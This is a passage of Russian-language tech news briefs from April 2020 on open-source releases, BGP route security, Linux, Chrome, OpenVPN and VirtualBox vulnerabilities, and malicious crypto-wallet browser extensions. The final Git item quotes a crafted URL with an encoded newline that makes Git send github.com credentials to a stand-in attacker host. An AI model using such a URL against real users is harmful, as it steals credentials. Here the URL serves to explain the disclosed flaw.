Компания Cloudflare ввела в строй сайт isBGPSafeYet.com, призванный привлечь внимание к проблеме с утечкой некорректных BGP-маршрутов и возможности совершения атак по перенаправлению трафика при помощи протокола BGP. Сайт позволяет проверить применение провайдерами технологии фильтрации некорректных маршрутов и оценить внедрение поддержки RPKI. Многие операторы остаются незащищёнными от поступления BGP-анонсов подсетей с фиктивными сведениями о длине маршрута, направляющими транзитный трафик через сторонних провайдеров. Всё чаще всплывают случаи использования BGP для атак, в ходе которых злоумышленники путём компрометации инфраструктуры провайдеров организуют перенаправление и перехват трафика для подмены конкретных сайтов через организацию MiTM-атаки для замены ответов DNS. Решением проблемы является внедрение системы авторизации BGP-анонсов … Читать далее Cloudflare запустил сервис для отслеживания фильтрации некорректных маршрутов BGP

Представлен релиз дисплейного сервера Mir 1.8, разработка которого продолжается компанией Canonical, несмотря на отказ от развития оболочки Unity и редакции Ubuntu для смартфонов. Mir остаётся востребован в проектах Canonical и теперь позиционируется как решение для встраиваемых устройств и интернета вещей (IoT). Mir может использоваться в качестве композитного сервера для Wayland, что позволяет запускать в окружениях на базе Mir любые приложения, использующие Wayland (например, собранные с GTK3/4, Qt5 или SDL2). Пакеты для установки подготовлены для Ubuntu 16.04-20.04 (PPA) и Fedora 30/31/32. Код проекта распространяется под лицензией GPLv2. В новом выпуске главные изменения связаны с расширением поддержки экранов с высокой плотностью пикселей … Читать далее Выпуск дисплейного сервера Mir 1.8

Роман Гилг (Roman Gilg), участвующий в разработке KDE, Wayland, Xwayland и X Server, представил проект KWinFT (KWin Fast Track), развивающий гибкий и простой в использовании композитный оконный менеджер для Wayland и X11, основанный на кодовой базе KWin. Помимо оконного менеджера проект также развивает библиотеку wrapland с реализацией обвязки над libwayland для Qt/C++, продолжающей развитие KWayland, но избавленной от привязки к Qt. Код распространяется под лицензиями GPLv2 и LGPLv2. Целью проекта является переработка KWin и KWayland с использованием современных технологий и практик разработки, позволяющих ускорить развитие проекта, провести рефакторинг кода, добавить оптимизации и упростить добавление фундаментальных новшеств, интеграция которых в KWin … Читать далее Представлен KWinFT, форк KWin, сфокусированный на Wayland

Состоялся выпуск сервера приложений NGINX Unit 1.17, в рамках которого развивается решение для обеспечения запуска web-приложений на различных языках программирования (Python, PHP, Perl, Ruby, Go, JavaScript/Node.js и Java). Под управлением NGINX Unit может одновременно выполняться несколько приложений на разных языках программирования, параметры запуска которых можно изменять динамически без необходимости правки файлов конфигурации и перезапуска. Код написан на языке Си и распространяется под лицензией Apache 2.0. С особенностями NGINX Unit можно познакомиться в анонсе первого выпуска. В новой версии: Возможность использования выражений «return» и «location» в блоках «action» для немедленного возвращения произвольного кода возврата или перенаправления на внешний ресурс. Например, для … Читать далее Выпуск сервера приложений NGINX Unit 1.17.0

Сформирован корректирующий выпуск пакета для создания виртуальных частных сетей OpenVPN 2.4.9. В новой версии устранена уязвимость (CVE-2020-11810), позволяющая перевести сеанс клиента на новый IP-адрес, который до этого не был авторизирован. Проблема может быть использована для перехвата трафика VPN только что подключившегося клиента, для которого ещё не завершено согласование сессионных ключей. Среди других изменений: На платформе Windows разрешено использовать поисковые unicode-строки в опции «—cryptoapicert»; Обеспечен пропуск просроченных сертификатов в хранилище сертификатов Windows; Решена проблема с невозможностью загрузки нескольких размещённых в одном файле CRL (Certificate Revocation List) при использовании опции «—crl-verify» на системах c OpenSSL; При использовании опции»—auth-user-pass file» при наличии в … Читать далее Обновление OpenVPN 2.4.9

Разработчики проекта Fedora объявили о переносе релиза Fedora 32 на одну неделю в связи с невыполнением критериев качества. Релиз Fedora 32 планируют выпустить 28 апреля, а не 21 апреля, как было намечено изначально. В финальных тестовых сборках остаются неисправленными 3 проблемы, которые отнесены к блокирующим выпуск. Из блокирующих релиз проблем можно отметить: проблемы с распознаванием LVM-разделов в режиме восстановления после сбоя, зависание при попытке загрузки на системах с GPU NVIDIA Turing в режиме «Secure Boot» и отсутствие финальной версии пакета f32-backgrounds в стабильном репозитории. Источник: http://www.opennet.ru/opennews/art.shtml?num=52751 Читать далее Релиз Fedora 32 отложен на неделю

Представлен выпуск системы обмена сообщениями Mattermost 5.22, ориентированной на обеспечение коммуникации разработчиков и сотрудников предприятий. Код серверной части проекта написан на языке Go и распространяется под лицензией MIT. Web-интерфейс и мобильные приложения написаны на JavaScript с использованием React, десктоп-клиент для Linux, Windows и macOS построен на платформе Electron. В качестве СУБД могут применяться MySQL и Postgres. Mattermost позиционируется как открытая альтернатива системе организации коммуникаций Slack и позволяет получать и отправлять сообщения, файлы и изображения, отслеживать историю переговоров и получать уведомления на смартфоне или ПК. Поддерживаются подготовленные для Slack модули интеграции, а также предоставлена большая коллекция собственных модулей для интеграции с … Читать далее Выпуск системы обмена сообщениями Mattermost 5.22

Компания Valve опубликовала выпуск проекта Proton 5.0-6, который основан на наработках проекта Wine и нацелен на обеспечение запуска в Linux игровых приложений, созданных для Windows и представленных в каталоге Steam. Наработки проекта распространяются под лицензией BSD. Proton позволяет напрямую запускать в Linux-клиенте Steam игровые приложения, поставляемые только для Windows. Пакет включает в себя реализацию DirectX 9/10/11 (на базе пакета DXVK) и DirectX 12 (на базе vkd3d), работающие через трансляцию вызовов DirectX в API Vulkan, предоставляет улучшенную поддержку игровых контроллеров и возможность использования полноэкранного режима независимо от поддерживаемых в играх разрешений экрана. Для увеличения производительности многопоточных игр поддерживаются механизмы «esync» (Eventfd … Читать далее Компания Valve выпустила Proton 5.0-6, пакет для запуска Windows-игр в Linux

В драйвере vhost-net, обеспечивающем работу virtio net на стороне хост-окружения, выявлена уязвимость (CVE-2020-10942), позволяющая локальному пользователю инициировать переполнение стека ядра через отправку устройству /dev/vhost-net определённым образом оформленного ioctl(VHOST_NET_SET_BACKEND). Проблема вызвана отсутствием должной проверки содержимого поля sk_family в коде функции get_raw_socket(). По предварительным данным уязвимость можно использовать для совершения локальной DoS-атаки через вызов краха ядра (сведений об использовании вызываемого уязвимостью переполнения стека для организации выполнения кода нет). Уязвимость устранена в обновлении ядра Linux 5.5.8. Для дистрибутивов проследить за выпуском обновлений пакетов можно на страницах Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch. Источник: http://www.opennet.ru/opennews/art.shtml?num=52747 Читать далее Уязвимость в драйвере vhost-net из состава ядра Linux

Компания GitHub Inc, принадлежащая Microsoft и функционирующая в качестве независимого бизнес-подразделения, объявила об успешном завершении сделки по покупке бизнеса компании NPM Inc, контролирующей разработку пакетного менеджера NPM и занимающейся поддержанием репозитория NPM. Репозиторий NPM обслуживает более 1.3 млн пакетов, которыми пользуются около 12 млн разработчиков. В месяц фиксируется около 75 миллиардов загрузок. Сумма сделки не называется. Ahmad Nassri, технический директор NPM Inc, сообщил о решении уйти из команды NPM, отдохнуть, проанализировать свой опыт и воспользоваться новыми возможностями (в профиле Ахмеда появились данные, что он занял должность техдиректора в компании Fractional). Айзек Шлютер (Isaac Z. Schlueter), создатель NPM, продолжит работать над … Читать далее GitHub успешно завершил сделку по покупке NPM

Опубликовано обновление браузера Chrome 81.0.4044.113 в котором устранена уязвимость, имеющая статус критической проблемы, позволяющей обойти все уровни защиты браузера и выполнить код в системе, за пределами sandbox-окружения. Детали об уязвимости (CVE-2020-6457) пока не раскрываются, известно только, что она вызвана обращением к уже освобождённому блоку памяти в компоненте для распознавания речи (к слову, прошлая критическая уязвимость в Chrome также затрагивала данный компонент). Источник: http://www.opennet.ru/opennews/art.shtml?num=52745 Читать далее Обновление Chrome 81.0.4044.113 с устранением критической уязвимости

Швейцарская компания Proton Technologies AG объявила в своём блоге об открытии исходного кода приложения ProtonMail Bridge для всех поддерживаемых платформ (Linux, MacOS, Windows). Код распространяется под лицензией GPLv3. Дополнительно опубликована модель безопасности приложения. Заинтересованным экспертам предложено присоединиться к программе bug bounty. ProtonMail Bridge предназначен для работы с сервисом защищённой электронной почты ProtonMail с использованием предпочитаемого десктопного почтового клиента, сохраняя при этом высокий уровень защиты передаваемых по сети данных. Ранее приложение было доступно только на платных тарифах. Таким образом компания продолжает процесс постепенного открытия исходных кодов, начатый в 2015г. Ранее в разряд открытых уже были переведены: Web-фронтенд Почтовый клиент для iOS … Читать далее Открыт исходный код ProtonMail Bridge

Состоялся релиз пакетного менеджера GNU Guix 1.1 и построенного на его основе дистрибутива GNU/Linux. Для загрузки сформированы образы для установки на USB Flash (241 Мб)и использования в системах виртуализации (479 Мб). Поддерживается работа на архитектурах i686, x86_64, armv7 и aarch64. Дистрибутив допускает установку как в качестве обособленной ОС в системах виртуализации, в контейнерах и на обычном оборудовании, так и запуск в уже установленных дистрибутивах GNU/Linux, выступая в роли платформы для развёртывания приложений. Пользователю предоставляются такие функции, как учёт зависимостей, повторяемые сборки, работа без root, откат на прошлые версии в случае проблем, управление конфигурацией, клонирование окружений (создание точной копии программного окружения … Читать далее Доступен пакетный менеджер GNU Guix 1.1 и дистрибутив на его основе

Компания Oracle опубликовала корректирующий релиз системы виртуализации VirtualBox 6.1.6, в котором отмечено 9 исправлений. Одновременно также выпущены корректирующие релизы VirtualBox 6.0.20 и 5.2.40. В обновлениях устранено 19 уязвимостей, из которых 7 проблем имеют критический уровень опасности (CVSS больше 8). В том числе устранены уязвимости, используемые в атаках, продемонстрированных на соревновании Pwn2Own 2020 и позволяющие через манипуляции на стороне гостевой системы получить доступ к хост-системе и выполнить код с правами гипервизора. Не связанные с безопасностью изменения в выпуске 6.1.6: В компоненты для хост-окружения и дополнения для гостевых систем добавлена поддержка ядра Linux 5.6; Улучшена поддержка 2D- и 3D-ускорения, а также рендеринга; … Читать далее Выпуск VirtualBox 6.1.6

Компании MyCrypto и PhishFort выявили в каталоге Chrome Web Store 49 вредоносных дополнений, отправляющих ключи и пароли от криптокошельков на серверы злоумышленников. Дополнения распространялись с использованием методов фишинговой рекламы и преподносились как реализации различных кошельков криптовалют. Дополнения были основаны на коде официальных кошельков, но включали вредоносные изменения, выполняющие отправку закрытых ключей, кодов восстановления доступа и файлов с ключами. Для некоторых дополнений при помощи фиктивных пользователей искусственно поддерживался положительный рейтинг и публиковались положительные отзывы. Компания Google удалила указанные дополнения из каталога Chrome Web Store в течение 24 часов после уведомления. Публикация первых вредоносных дополнений началась в феврале, но пик пришёлся на … Читать далее В Chrome Web Store выявлено 49 дополнений, перехватывающих ключи от криптокошельков

Разработчики пакета совместной работы и электронной почты Zimbra, позиционируемого как альтернатива MS Exchange, изменили политику в области публикации открытого кода. Начиная с выпуска Zimbra 9 проект перестанет публиковать бинарные сборки Zimbra Open Source Edition и ограничится только выпуском коммерческой версии Zimbra Network Edition. Более того, разработчики не планируют выпускать исходные тексты Zimbra 9 для сообщества и будут развивать Zimbra 9 в форме проприетарного продукта. Старая ветка Zimbra 8.8.15 останется открытой и будет сопровождаться до 31 декабря 2024 года. Источник: http://www.opennet.ru/opennews/art.shtml?num=52739 Читать далее Zimbra сворачивает публикацию открытых выпусков для новой ветки

Для реализации в Fedora 33 намечено изменение, переводящее дистрибутив на использование по умолчанию systemd-resolved для резолвинга DNS-запросов. Glibc будет переведён на nss-resolve от проекта systemd вместо встроенного NSS-модуля nss-dns. Systemd-resolved выполняет такие функции как поддержание настроек в файле resolv.conf на основании данных DHCP и статической конфигурации DNS для сетевых интерфейсов, поддерживает DNSSEC и LLMNR (Link Local Multicast Name Resolution). Из достоинств перехода на systemd-resolved называется поддержка DNS over TLS, возможность включения локального кэширования DNS-запросов и поддержка привязки разных обработчиков к разным сетевым интерфейсам (в зависимости от сетевого интерфейса выбирается DNS-сервер для обращения, например для VPN-интерфейсов DNS-запросы будут отправляться через VPN). … Читать далее В Fedora 33 планируют перейти на использование systemd-resolved

Сформирован выпуск основной ветки nginx 1.17.10, в рамках которой продолжается развитие новых возможностей (в параллельно поддерживаемой стабильной ветке 1.16 вносятся только изменения, связанные с устранением серьёзных ошибок и уязвимостей). В новой версии реализована новая директива «auth_delay«, позволяющая добавить задержку неавторизованных запросов с кодом ответа 401 для сокращения интенсивности подбора паролей и защиты от атак, манипулирующих измерением времени выполнения операций (timing attack) при обращении к системам, доступ к которым ограничен паролем, результатом подзапроса или JWT (JSON Web Token). Источник: http://www.opennet.ru/opennews/art.shtml?num=52736 Читать далее Выпуск nginx 1.17.10

В кодовую базу «ZFS on Linux«, развиваемую под эгидой проекта OpenZFS в качестве эталонной реализации ZFS, приняты изменения, добавляющие поддержку операционной системы FreeBSD. Добавленный в «ZFS on Linux» код протестирован в ветках FreeBSD 11 и 12. Таким образом, разработчикам FreeBSD теперь не нужно поддерживать собственное синхронизированное ответвление «ZFS on Linux» и разработка всех связанных с FreeBSD изменений будет осуществляться в основном проекте. Кроме того, работоспособность во FreeBSD основной ветки «ZFS on Linux» в процессе разработки будет тестироваться в системе непрерывной интеграции. Напомним, что в декабре 2018 года разработчики FreeBSD выступили с инициативой перехода на реализацию ZFS от проекта «ZFS on … Читать далее В ZFS on Linux добавлена поддержка FreeBSD

Опубликовано обновление операционной системы Solaris 11.4 SRU 20 (Support Repository Update), в котором предложена серия очередных исправлений и улучшений для ветки Solaris 11.4. Для установки предложенных в обновлении исправлений достаточно выполнить команду ‘pkg update’. В новом выпуске пакет ICU (International Components for Unicode) обновлён до версии 65.1, исправлено чуть менее ста ошибок, включая обновления версий следующих компонентов для устранения проблем с безопасностью: tcpdump 4.9.3, libpcap 1.9.1, sudo 1.8.30, wireshark 2.6.15, Apache Tomcat 8.5.51, mod_auth_mellon 0.16.0, Firefox 68.6.0esr, PHP 7.3.15, Thunderbird 68.6.0, openjpeg. Источник: http://www.opennet.ru/opennews/art.shtml?num=52735 Читать далее Обновление Solaris 11.4 SRU 20

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 и 2.17.4, в которых устранена уязвимость (CVE-2020-5260) в обработчике «credential.helper«, приводящая к отправке учётных данных не на тот хост при обращении git-клиента к репозиторию по специально оформленному URL, содержащему символ новой строки. Уязвимость можно использовать для организации отправки на сервер, подконтрольный атакующему, учётных данных от другого хоста. При указании URL вида «https://evil.com?%0ahost=github.com/» обработчик учётных данных при подключении к хосту evil.com передаст параметры аутентификации, заданные для github.com. Проблема проявляется при выполнении таких операций, как «git clone», в том числе при обработке URL для … Читать далее Уязвимость в Git, приводящая к утечке учётных данных